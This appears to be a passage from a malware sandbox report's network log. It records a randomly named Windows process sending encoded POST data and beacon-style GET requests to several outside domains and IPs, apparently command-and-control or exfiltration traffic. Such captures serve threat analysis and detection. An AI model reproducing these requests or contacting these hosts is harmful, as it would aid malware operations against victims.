                                   Session ID: 11 | Source IP: 192.168.2.4 | Source Port: 55820 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5964 | Process: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                   Timestamp: Sep 16, 2024 09:30:52.059668064 CEST | Bytes transferred: 10891 | Direction: OUT | Data:
                                   POST /jvjp/ HTTP/1.1
                                  Host: www.crowsecurity.cloud
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.crowsecurity.cloud
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 10302
                                  Referer: http://www.crowsecurity.cloud/jvjp/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)


                                   Session ID: 12 | Source IP: 192.168.2.4 | Source Port: 55821 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5964 | Process: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                   Timestamp: Sep 16, 2024 09:30:54.611202002 CEST | Bytes transferred: 516 | Direction: OUT | Data:
                                   GET /jvjp/?h2Pt9=4b5MqvIelA8yeSWKDPRIdHesNV5XUrpBTJ6STZ7OqVlET0aP4dQGxyJ8Yal1yomp/rzgkCoCCWVuqR9lxGRqCv57Hh5Ivk5Sj0mDZDuer/ujvu4zkb6QZi8=&4RLhs=7BJLM4eH HTTP/1.1
                                  Host: www.crowsecurity.cloud
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Connection: close
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                   Timestamp: Sep 16, 2024 09:30:57.993134022 CEST | Bytes transferred: 396 | Direction: IN | Data:
                                   HTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Mon, 16 Sep 2024 07:30:57 GMT
                                  Content-Type: text/html
                                  Content-Length: 256
                                  Connection: close
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?h2Pt9=4b5MqvIelA8yeSWKDPRIdHesNV5XUrpBTJ6STZ7OqVlET0aP4dQGxyJ8Yal1yomp/rzgkCoCCWVuqR9lxGRqCv57Hh5Ivk5Sj0mDZDuer/ujvu4zkb6QZi8=&4RLhs=7BJLM4eH"}</script></head></html>


                                   Session ID: 13 | Source IP: 192.168.2.4 | Source Port: 55822 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5964 | Process: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                   Timestamp: Sep 16, 2024 09:31:03.167507887 CEST | Bytes transferred: 783 | Direction: OUT | Data:
                                   POST /p8sm/ HTTP/1.1
                                  Host: www.inspireplay.live
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.inspireplay.live
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 202
                                  Referer: http://www.inspireplay.live/p8sm/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Ascii: h2Pt9=ts1RUs7PstU7CnFg00G36H4ub2CKEw0KCobFBZEH8CpfnQoiqYZ0nn/wl1B4KWDW6q2+icwfMTIxuf1mjyDYFP2nkepPuMpTBK5UxYvqOKcrwLXOsBFGLlm7IRnkR3w/2vIUhvRZsdGfwe8rcwCmJbaqQKWCuz+gwkQ0akXzCEu4aDYt4M16sugTD+CjkF09qg==


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  14 | 192.168.2.4 | 55823 | 3.33.130.190 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Sep 16, 2024 09:31:05.729437113 CEST | 803 | OUT | POST /p8sm/ HTTP/1.1
                                  Host: www.inspireplay.live
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.inspireplay.live
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 222
                                  Referer: http://www.inspireplay.live/p8sm/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Ascii: h2Pt9=ts1RUs7PstU7BHVgyVG34n4pUWCKOQ0GCoHFBboX8wNfmwYird50qH/wuVAzUmDN6qLJiZIfMTMxueFmjhrbHf2pxupJqMpTBK5UxYqBOKUrx/TO+0pFCFmkCxnkV3w72vJxhuMCsbKfweMrci6nDbasUKWShiHVyR0+V0PIAnmlSlJ3p9Ut+uEge5LXpGJ0xvaM1r0C0MXbV6IJ1baYekA=


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  15 | 192.168.2.4 | 55824 | 3.33.130.190 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Sep 16, 2024 09:31:08.282540083 CEST | 10885 | OUT | POST /p8sm/ HTTP/1.1
                                  Host: www.inspireplay.live
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.inspireplay.live
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 10302
                                  Referer: http://www.inspireplay.live/p8sm/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Ascii: h2Pt9= [TRUNCATED]


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  16 | 192.168.2.4 | 55825 | 3.33.130.190 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Sep 16, 2024 09:31:10.822659969 CEST | 514 | OUT | GET /p8sm/?h2Pt9=gudxXcfIjfM6RSgjlHSXwEEWc2+zEXg0KLmBWaNcxhhcux8g2aNs+kqO3FQMDVnLkpHMsugYGQwIm+gz0yjubt2jusNNuut2QLx2iafcYqdrxcPN6iJJGks=&4RLhs=7BJLM4eH HTTP/1.1
                                  Host: www.inspireplay.live
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Connection: close
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Sep 16, 2024 09:31:11.291126013 CEST | 396 | IN | HTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Mon, 16 Sep 2024 07:31:11 GMT
                                  Content-Type: text/html
                                  Content-Length: 256
                                  Connection: close
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?h2Pt9=gudxXcfIjfM6RSgjlHSXwEEWc2+zEXg0KLmBWaNcxhhcux8g2aNs+kqO3FQMDVnLkpHMsugYGQwIm+gz0yjubt2jusNNuut2QLx2iafcYqdrxcPN6iJJGks=&4RLhs=7BJLM4eH"}</script></head></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  17 | 192.168.2.4 | 55826 | 156.242.132.82 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Sep 16, 2024 09:31:16.951042891 CEST | 780 | OUT | POST /p2q3/ HTTP/1.1
                                  Host: www.shanhaiguan.net
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.shanhaiguan.net
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 202
                                  Referer: http://www.shanhaiguan.net/p2q3/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Ascii: h2Pt9=IIer9KqcUCtcoOcmKfJeOd/R/pkgxYA2Err6uDFJW+EIlQsR8NdQpTKYDSzczePl8zHBeqd0i/raLG0t4HYudyk+8nD/4M24rQ4T85Sf34hrzTuOE6EMKf1kcNUlcxL3gWfa86OrPCfFg7oR4g4VeBi5MS7OwuG+Hy5H44zHpaY1i+kfgIyhfPkcLdwupnRNbQ==


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  18 | 192.168.2.4 | 55827 | 156.242.132.82 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Sep 16, 2024 09:31:19.501806021 CEST | 800 | OUT | POST /p2q3/ HTTP/1.1
                                  Host: www.shanhaiguan.net
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.shanhaiguan.net
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 222
                                  Referer: http://www.shanhaiguan.net/p2q3/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Ascii: h2Pt9=IIer9KqcUCtcpvsmHcReL9/S8pkgqoAyEr36uGpnWswIlxcR7JpQuTKYbCzVsOPQ8zK+eqx0i/vaLDQt70wtSCk4l3Dhl824rQ4T85G5345rzDeOVrEPJf1rbNUlYxLzgWfk87SNPEDFg5gR70USVBizDy67+ujuHXwv4ZOknIotqY1Fx5T2NPAvWa5akksEAZ8d7dJ5uAGC9N+6nk12LWc=


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  19 | 192.168.2.4 | 55828 | 156.242.132.82 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Sep 16, 2024 09:31:22.048216105 CEST | 10882 | OUT | POST /p2q3/ HTTP/1.1
                                  Host: www.shanhaiguan.net
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.shanhaiguan.net
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 10302
                                  Referer: http://www.shanhaiguan.net/p2q3/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Ascii: h2Pt9=IIer9KqcUCtcpvsmHcReL9/S8pkgqoAyEr36uGpnWsoIlDUR9u1QvTKYFSzQsOP38zS6eqtki8HaaVct+BMtJSk44nD84M2XrQoX85W5345rzFaOV6EPG/1kcNVkcxLPgWWf87m7M3bFu5QRrXsScBi9PS6j+ue0HXEN4ZrLnL0tosUvmZnLbcoiAotullU2Zr9p3sF+2xGZ7fDS2URMQirHuElbhCx3kNMucf+504FY54WH6nxDZB7kMd9PWnXlXK63benZpIcQdycWdq587FlJIID1SxPVq6yp0tpBt6g/S7JWzhrIiPSYxauvw6AP0VHFqcKNAuEJhC8s7UiyNqii1in2H0SmpPHL9FFSl0zLa5zLFfyLJID2MC4gG+5j5IzGiYK79WV6x5ufpQUe4IOOkOY3bYoduACEe+4kWG5Ay+2zYyIpbGtYw5idcPDNpTwMxbmCmEQKMOtGwBN2gQ1pCpyamrN2BWWTp56qMe5zg68NvbS7UzMJfc2HJ5CuSsZE550AqRr2v0rOB7B3/U1Aw9xWbPcgfqmF2QbsT50f5atfqWYCy+i/om37bKt/FzLmAwfftGz3DF90tbAxYCdQ4EPKeUd8izajmj19+0I4y0RV2AO6fYe/QwKyK5L0FQk6i3HbQpK/f5xOd5Rg86o9ctxmEQW6GbIZiR6iDkUupUaF49cioTNx50qhs6ESCRjwjlfEHkbs+zGF/kzZ59W9Wy5NdWeFWhG+WqXttHDURp7Z4qszCiqCqookNPOEjdl2Cl1dPxnsrkG6F/O0YmZtzINVlJr1O680GRKt3xL7fXgge2A6O83Tlpe9ZPaFvamawprpSOr7KXNRTCVEKY8hAd5PbRANsOQLUePJgK45CKREymcHmVNCWiPjWZi8mUEgl2R4dUQLQSzIC2xfKIYBZ2uYfFnryPDmzlnvz8YxnF+F102dKvGveCF2Zh8bcN09G+w9e9RYi4Yv16ayrwzCKGUXQLNThMuTDP9sGaL2ed [TRUNCATED]


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  20 | 192.168.2.4 | 55829 | 156.242.132.82 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Sep 16, 2024 09:31:24.588167906 CEST | 513 | OUT | GET /p2q3/?h2Pt9=FK2L+8PIei1GuvtlS8gCO8fM4ZQmscEbBI34s0k1PsRmujAOjfMM4GbCZxnV6srYixPIeZB0oPqoKkF830AnIDgf70T/wPSZ3Q0Y3Iy42KJKjy26SpAoBvI=&4RLhs=7BJLM4eH HTTP/1.1
                                  Host: www.shanhaiguan.net
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Connection: close
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  21 | 192.168.2.4 | 55830 | 136.143.186.12 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Sep 16, 2024 09:31:51.201567888 CEST | 774 | OUT | POST /ivo1/ HTTP/1.1
                                  Host: www.lanxuanz.tech
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.lanxuanz.tech
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 202
                                  Referer: http://www.lanxuanz.tech/ivo1/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Ascii: h2Pt9=SJTlFd9On262Hn/Qvd7iJKOGUlUPyYVQ+mnd50d476Cp826QEnvLkeG9EuFaNgiu9Gab7CDPjAgKtSzLXjbX+499WTpIgX//Zvap8WOIntHtePjMS+t/h0Ld2B118sNYys0ZHMp8KWCZdM/OiLvn3W9r49VAFslED0zBOJ08+e+JZeHea66fOSKXkluNJ52iLQ==
                                  Sep 16, 2024 09:31:51.816766977 CEST | 1236 | IN | HTTP/1.1 404
                                  Server: ZGS
                                  Date: Mon, 16 Sep 2024 07:31:51 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: zalb_8ae64e9492=0f71d2b25c73f2883ce01c2fd3c97eb8; Path=/
                                  Set-Cookie: csrfc=08991024-0bb3-41ad-b15f-0150db8a73f8;path=/;priority=high
                                  Set-Cookie: _zcsr_tmp=08991024-0bb3-41ad-b15f-0150db8a73f8;path=/;SameSite=Strict;priority=high
                                  Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                  Pragma: no-cache
                                  Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                  vary: accept-encoding
                                  Content-Encoding: gzip
                                  Sep 16, 2024 09:31:51.816786051 CEST | 723 | IN | Data Raw: c4 9a 5a 58 38 05 97 29 f2 ef 81 e3 55 a0 be 94 ef ab 5a 00 f6 d9 e7 e9 9c c0 6c 7b 93 6b ab 67 c2 34 cd ba d3 f4 2c 34 dd c7 f4 f0 bb 68 4a df 6a 53 9e 8b 89 32 b1 09 9f 4f 97 da 49 1f 31 8a fa 36 da b0 5f 7f 03 32 c3 56 c0 ad 37 cd a8 02 6d 73


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  22 | 192.168.2.4 | 55831 | 136.143.186.12 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Sep 16, 2024 09:31:53.751403093 CEST | 794 | OUT | POST /ivo1/ HTTP/1.1
                                  Host: www.lanxuanz.tech
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.lanxuanz.tech
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 222
                                  Referer: http://www.lanxuanz.tech/ivo1/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Ascii: h2Pt9=SJTlFd9On262HHPQu+jiIqOFbFUPpoUb+mrd52xo8M6p7TGQWmvLjeG9OOFVJgix9GW97D/PjA0KtTDLWUHU/o97ZzoOu3//Zvap8Wamntfte+TMSbZ8sULChx11r8NUys16HOMRKU6ZdO3OjeDk5W9X0tUCLc9PahezDrwD0+qyYYWELLbIcSuk5in5E6LrQTd2GwYJ3QSB8PW2FTa7CmY=
                                  Sep 16, 2024 09:31:54.363596916 CEST | 1236 | IN | HTTP/1.1 404
                                  Server: ZGS
                                  Date: Mon, 16 Sep 2024 07:31:54 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: zalb_8ae64e9492=9a53152e40f8a6327f1486af29c1a1cb; Path=/
                                  Set-Cookie: csrfc=24516bb7-e653-4a88-8a43-0f9311ec35ff;path=/;priority=high
                                  Set-Cookie: _zcsr_tmp=24516bb7-e653-4a88-8a43-0f9311ec35ff;path=/;SameSite=Strict;priority=high
                                  Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                  Pragma: no-cache
                                  Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                  vary: accept-encoding
                                  Content-Encoding: gzip
                                  Sep 16, 2024 09:31:54.363715887 CEST | 723 | IN | Data Raw: c4 9a 5a 58 38 05 97 29 f2 ef 81 e3 55 a0 be 94 ef ab 5a 00 f6 d9 e7 e9 9c c0 6c 7b 93 6b ab 67 c2 34 cd ba d3 f4 2c 34 dd c7 f4 f0 bb 68 4a df 6a 53 9e 8b 89 32 b1 09 9f 4f 97 da 49 1f 31 8a fa 36 da b0 5f 7f 03 32 c3 56 c0 ad 37 cd a8 02 6d 73


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  23 | 192.168.2.4 | 55832 | 136.143.186.12 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Sep 16, 2024 09:31:56.295933008 CEST | 10876 | OUT | POST /ivo1/ HTTP/1.1
                                  Host: www.lanxuanz.tech
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.lanxuanz.tech
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 10302
                                  Referer: http://www.lanxuanz.tech/ivo1/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Ascii: h2Pt9= [TRUNCATED]
                                  Sep 16, 2024 09:31:56.919030905 CEST | 549 | IN | HTTP/1.1 400
                                  Server: ZGS
                                  Date: Mon, 16 Sep 2024 07:31:56 GMT
                                  Content-Type: text/html;charset=ISO-8859-1
                                  Content-Length: 80
                                  Connection: close
                                  Set-Cookie: zalb_8ae64e9492=ed5ecf2ddf0efdb48949d480344efa60; Path=/
                                  Set-Cookie: csrfc=50d7bdd2-4008-493f-a0cd-8a79b930a374;path=/;priority=high
                                  Set-Cookie: _zcsr_tmp=50d7bdd2-4008-493f-a0cd-8a79b930a374;path=/;SameSite=Strict;priority=high
                                  Set-Cookie: JSESSIONID=340A28F6229DD23CEA862A6D95A42F6C; Path=/; HttpOnly
                                  Data Ascii: {"response_code":"400","status_code":"1","developer_message":"Invalid input."}


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  24 | 192.168.2.4 | 55833 | 136.143.186.12 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Sep 16, 2024 09:31:58.837265968 CEST | 511 | OUT | GET /ivo1/?h2Pt9=fL7FGqwZgFyeKETJ58v2LpmodVM6vZtD0XO9xnYIy5nXxzuHXVLl0+u5SqQtPDeu0FT/+Cn/ojl8jT3mUhnhpKNreTIBn1GsPPCO7XuNhO+zSMbYdoB0rmQ=&4RLhs=7BJLM4eH HTTP/1.1
                                  Host: www.lanxuanz.tech
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Connection: close
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Sep 16, 2024 09:31:59.435956955 CEST | 1236 | IN | HTTP/1.1 404
                                  Server: ZGS
                                  Date: Mon, 16 Sep 2024 07:31:59 GMT
                                  Content-Type: text/html
                                  Content-Length: 4641
                                  Connection: close
                                  Set-Cookie: zalb_8ae64e9492=d2341ff8556820e5fe7583c4c06e32ae; Path=/
                                  Set-Cookie: csrfc=36e84a87-ed21-454b-b48b-c60bbf29f94c;path=/;priority=high
                                  Set-Cookie: _zcsr_tmp=36e84a87-ed21-454b-b48b-c60bbf29f94c;path=/;SameSite=Strict;priority=high
                                  Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                  Pragma: no-cache
                                  Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                  vary: accept-encoding
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 5a 6f 68 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 77 65 62 66 6f 6e 74 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 0a 20 20 20 20 20 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html> <head> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet" /> <title>Zoho</title> <link type="text/css" rel="stylesheet" href="/webfonts?family=Open+Sans:400,600"> <style> body{ font-family:"Open Sans", sans-serif; font-size:11px; margin:0px; padding:0px; background-color:#f5f5f5; } .topColors{ background: -moz-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background: -webkit-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50
                                  Sep 16, 2024 09:31:59.435981989 CEST | 1236 | IN | Data Raw: 25 2c 20 23 30 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a
                                  Data Ascii: %, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background-size:452px auto;height:3px; } .mainContainer{ width:1000px; margin:0px auto; } .logo{ margin
                                  Sep 16, 2024 09:31:59.435997963 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 68 33 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 3b 0a 20 20 20 20
                                  Data Ascii: h3{ font-size:18px; font-family: "Open Sans"; font-weight:normal; font-weight:600; } .weight400{ font-weight:400; } .domain-color{
                                  Sep 16, 2024 09:31:59.436369896 CEST | 1236 | IN | Data Raw: 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b
                                  Data Ascii: rgba(0, 0, 0, 0.12); color: #ffffff; font-size: 18px; font-weight: 300; padding: 10px 20px; text-decoration: none; position:relative; } </style
